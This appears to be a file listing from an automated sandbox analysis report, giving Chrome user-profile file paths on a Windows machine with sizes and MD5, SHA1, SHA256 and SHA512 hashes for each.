SHA512
cf7a31b20ef5328e9672b43a57a0748ecca0dd61ca221710844bcba62962a7d6d5f9120d66ed812f274765653243da15b3aa43d716c02163f2db6877cb7b1d30

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sessions\Session_13363796323289794

Filesize
1KB

MD5
01ac55b0c7899aa6278b3ccfa16bba37

SHA1
2757af3fc8d9f90e87c723b9b442215d9f997dc9

SHA256
264bbabb51fbfb29a1e1fe9d661179ee5395e463390c913184e3168d0e9ea950

SHA512
6187d1fa9516453b0cfd52ec4b551dbf7943996e51048b0a9315817ecbd65eb0311d3415e3e00a0939e3a33a3477391e05bfe5969d829e905df98866746df2cd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sessions\Tabs_13363796354371794

Filesize
1KB

MD5
ee6254c79d7f1e1fb24459234783c962

SHA1
12b4836e1cc286dae1c612d036562b1eff97fbfb

SHA256
fb4c7d35a5f4db2ebc91dac8c970de69406f219a4676508fabb963622ef10bd6

SHA512
871ef9cf9eeecd99689779d95b1222d45f5b43f4899e538471eda181a28a84482f4a3b1e85a15222e40cd3ef14ad32d3c83959a6889c707317b8c422bda0ff6f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000003.log

Filesize
112B

MD5
c6036680585b43b986b0699ac97228a8

SHA1
b0caa3be23e82e80cff9f5fd67dc05878e3f9ed1

SHA256
da3ef472452e743f01c7d0de68ef9738d01b48f05ffaab4ca1a7da34b9c334ad

SHA512
ebbe1b5e9f512030d4e3b6476a3c3c28b8e5b09790859a822957993f1d301cb0c8abefe1fa2e49e3b2f91b2fab9f00e8634036fd8e7958aa74840720c0b225c0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG

Filesize
348B

MD5
51f5c2cb6e203e3a8a2b9f78281faa30

SHA1
8c5e67d45e65d24d7f43ba937448b7c99818f12e

SHA256
fc5c951fa289628b0032920aa1e9ca69776a5c33a09c768e7c24c2d71bad0a8d

SHA512
cd19936c0a4f3ac9a34c3d9dd8e01623c1780c666288eb6c2f906e7ecb1cd313844ffd9e606b82edf872cbb912eda43186a932b3c8c5fb6069db4c2c7ae0fa3c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.log

Filesize
15KB

MD5
ad32df993b7dbcfac8241f27b97f1c8f

SHA1
b56278ce3833fdb5bf6d5e5d7b0b5864a8291659

SHA256
b8f303b72152dee89521bc5af157710f65a180d18ce9efe13eb699feb08634ac

SHA512
00617dd8b036e8b57f403d5c95581379d330d8c1e4d52844ccaf10518409d4527850e4bc8ceef65dc4c53c87185f284bbb1c5ed2f9f97b56f10727703420701d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG

Filesize
324B

MD5
be8505b97a0b8bf6a68f2770e3fcf58b

SHA1
d1b8496407542f058b7913726cb3cb5d3ef88174

SHA256
2c622f060caa4887818c59630957ef02041a34c52106d20ec7263fefd6d204f3

SHA512
3d66d3440480c6465aeed2ba39ae8fa04a4f59b6ae83b2fa29c1df858bcbe8090933816949ebfcdb2823002d4e09ac1eb9a3a8265d95b85819e10eb56b649789

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log

Filesize
2KB

MD5
6e8f51c1232d4d16ada6b4a546f0d15f

SHA1
f80848cb56ed62f7d93e6c6a204a039b6ba852ff

SHA256
1d439362ea862933e69e84e755243b2c69c15b9f3678d92ced29efc8f6d5cbb0

SHA512
c8110716896cea2d4f459779915498a82d6c20b283aac08a2fe932e505e200526b26b3e4e467be8b2ec22df1e22ccd0104ba6c1cc0b346d6ff94d68af51c7dcb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\LOG

Filesize
317B

MD5
e8eed14e2b9045117b5d8092e259efe5

SHA1
a92fb4a8dbe898a7c34c01776ca3f31e4bec4e07

SHA256
fa99fcc144c8dfa704de60b04745030595acd46f803a20e48163b2aa97812508

SHA512
fa28a1603216c60e6b816a7fbbeb7f4a2953f053dd5e94c89575a6c58c115af7bb13d36fb2565e63a5814b25027871d8f481d0d4c6bcef1569e17217fc30f450

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\000003.log

Filesize
889B

MD5
5204a18c65e33392e3e55d2b05d18d11

SHA1
1e219b31fe9754d5307b30b6d8e29190df3fdcbe

SHA256
340d950fc837f6252f659825d6e161aecfc655c4d2d623538f92c0ab2842aaa9

SHA512
baaac7108f5a026270bb649d9d3fcecf863c381a4280b1cae337e86dbc466579345e6cc184bdf30060296c6f2ed2c997448f000de513877296816e8c3a5f8b44

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\LOG

Filesize
335B

MD5
3491d5eec754d10805520bc67824c032

SHA1
10b1b789e3a61e9e6ce2cd3f7479ac2031f73e5a

SHA256
cbc39222434efe8d3069f6eb5a7a93ddb387bb94bd4ba983cb96ee54e1472f97

SHA512
9e8118f23b8f3efd7a52194da6b981c55a81929a3d4cdf0a5ce3bb4bb7570c5ea09b496b5e1e05d8dea17c7607a7487ffd20e78caef7142cb60111bad5e76922

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_0

Filesize
44KB

MD5
d1be5f7a448c2e095e0791b1cde052ca

SHA1
66e660bc90ff23bb2dc957b2bae790657e02d86a

SHA256
45c6d12e68dd5eae3abd572d05b5992cf86800f0ca06b00010ae45fe58b7ae9c

SHA512
762b2b6f00ce3ef5c1c128bb85abe1535e1b9168fe518a5fc0ef8b1a64a2ae67a276cf45a508aa375d5e4cd3333e1f45042cbbdbaaba221703c8000021222855

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_1

Filesize
264KB

MD5
13834857e0d1287ff351c4ad4df293ec

SHA1
3531efc511abbe99594213a398f1117b7372c0ac

SHA256
3ae9fbf4996d45047d4bc5bde3e82395af4e59f0bfb59fb6058b04f68ab272ea

SHA512
5ab910543da1bd3ab5feaa533c46a64898cc2eeec41b927affba5d69c6b96e2a127046153b3bf2c72ce4db682f28eada822c773696d02cd68794507450894c3a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_3

Filesize
4.0MB

MD5
0d4414088beaebc121dc2d061b712858

SHA1
3e288af2572edf59efe56596db3404dc7acc8c18

SHA256
486cd141092f3f4a5853ec535fc0dde9a1ce965c1a8372c05bdb284636333a71

SHA512
27852e39ef4e9944cffaa8eabc34cd3c73380e9bee5945b8d479a5f8ccd424ebaf0e581b07043773b242badc8785ffa1737ab006f16ec0a84fc7a2ce11b62b9e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Browser

Filesize
106B

MD5
de9ef0c5bcc012a3a1131988dee272d8

SHA1
fa9ccbdc969ac9e1474fce773234b28d50951cd8

SHA256
3615498fbef408a96bf30e01c318dac2d5451b054998119080e7faac5995f590

SHA512
cea946ebeadfe6be65e33edff6c68953a84ec2e2410884e12f406cac1e6c8a0793180433a7ef7ce097b24ea78a1fdbb4e3b3d9cdf1a827ab6ff5605da3691724

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Version

Filesize
14B

MD5
009b9a2ee7afbf6dd0b9617fc8f8ecba

SHA1
c97ed0652e731fc412e3b7bdfca2994b7cc206a7

SHA256
de607a2c68f52e15a104ead9ecbaa3e6862fdb11eac080e408ba4d69f1f7a915

SHA512
6161dd952ae140a8fb8aa5e33f06bc65fdc15ce3fbfe4c576dc2668c86bce4a1d5c1112caee014e5efa3698547faad3bc80ec253eedb43148e36e1a02ce89910

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
255KB

MD5
4d266eab20ef0791321661af9f61c57f

SHA1
0884f26b6cd956fc1bc4320f2cb3938ea1a99a06

SHA256
f451b2368a0d0e55b5a0a1253c0237828f344463c2a23cef03e5cc4fdd430167

SHA512
c36e7279fccdeadf6a7123b5526e8fc3f18cedb58e95d22b1c25b2835af1ad5ddb82a88790cc925bcb4eb706c1935a7af1b42b6138edd43d08419703b874da57

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
255KB

MD5
487b9be49a9eb7291482065c72674bda

SHA1
ae2e59c846d307d288e7b8c256726733f78d7b95

SHA256
c9a58552a263d26b1aca28c8c05f1cc61cb4aa47a6fc7f28d9e9babba8e0b710

SHA512
901216ba32f46440be6dc2e48bfb8628e1e716b953f7b194ba818c091ba54404f7e483918354fb74fcae78aba50df7e13893b5408aa24258bbd011aa1e638a2b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
272KB

MD5
22afbff2ad19af75be954510e2818eb9

SHA1
3c63d29e687400b661b1f23144fc130daab57cae

SHA256
4860242377f09a8f0a4414b5af671c29d0b5a7e191dafe0d30593c56a35f1d21

SHA512
d95fe7d206573cba5db9504d1cf4cbb2fb9decb368f516a92859bf5ebebdd68ab561a3987f532768a5b5b38b049f07ce18d69daf11fe1aea8d6781eba2677984

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
88KB

MD5
6456f550468d0887c262409f19db4761

SHA1
4c3824269fcc0ce804fde367182a057b4ad62d33

SHA256
fcd506cf3eff92d913e56194630a2947fea1d6110724879682e902a0fd9bdc8d

SHA512
82ab3e22bce5f304807e0eba3bcdb146801dfa0995e5d096e17bf696f5a4c9c99ccdd5b1bde99bb68224748468d4ae5cab4a8f2bd6508ebce09825d436ac4e8b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
94KB

MD5
d3937273db6a57a8835dfe6fd85a5021

SHA1
538cc6a681fb3fa9fc1605552637f584366fbfed

SHA256
8b472e5845dc13183a3542e466aef8e6017149c42b182cb565f1ff584d054139

SHA512
e02d7ae3f175949db40709cec94fefc87906b2618df401dc13590a98d7d0f1296ac33ed3e4a57b2b0e58a4badfb5ff41c3fe0f579c3043ae95bf6f940cd91ff8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
91KB

MD5
1214206926da55767c3ea8b58646958a

SHA1
b572c07d2a684f4424155f6a6d62e7f32e7d87db

SHA256
1b9dbfca531d7c22ac9b2ad2f42f837cca1a800ac214aae38cebff83efe2d7b5

SHA512
3c693a5ac1cebbfdf8b4b60cd50207e3ba6139ead4f32a8e31d1a465a0f426ff8ca7968dc6917e78c5be69cf18729f25b32bbf4b0d4bc203f9003cd06b31860c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1

Filesize
264KB

MD5
f63a175b1cd3c20c0aaf7d0aa58a9231

SHA1
0885be9a0396b5542458ff7df9c8694662c9251e

SHA256
92890c7c38de00965e8184715c7dcbca9e398fe5fa9be2e1e6defbd3e2f9858a

SHA512
457a482cca25938235ecc7443086407079189c31aecd3fbfba033ff0415be105cc57de410191c955cd7cf9e5ff39892af47515855af4aa13a0e18c369a37f603

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Variations

Filesize
85B

MD5
bc6142469cd7dadf107be9ad87ea4753

SHA1
72a9aa05003fab742b0e4dc4c5d9eda6b9f7565c

SHA256
b26da4f8c7e283aa74386da0229d66af14a37986b8ca828e054fc932f68dd557

SHA512
47d1a67a16f5dc6d50556c5296e65918f0a2fcad0e8cee5795b100fe8cd89eaf5e1fd67691e8a57af3677883a5d8f104723b1901d11845b286474c8ac56f6182

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt

Filesize
4B

MD5
28d6d69da9716f4bae30840884c994f7

SHA1
2d697ebe59efe97c672b5eea2b38de61146a2bef

SHA256
2cf4b1cd74d1e297ffa5372fea97af28358f7488f75cf8c0288dd167c4948544

SHA512
9e722e2716258dbfafbbb3357c04fb7baa9bc22d3158b91afd2e28e6c75a2eda0b8c031ed1c34cdf7a7c35070de0ef4fdfead669cc6360ec6201eb2226b2bd47

Download Submit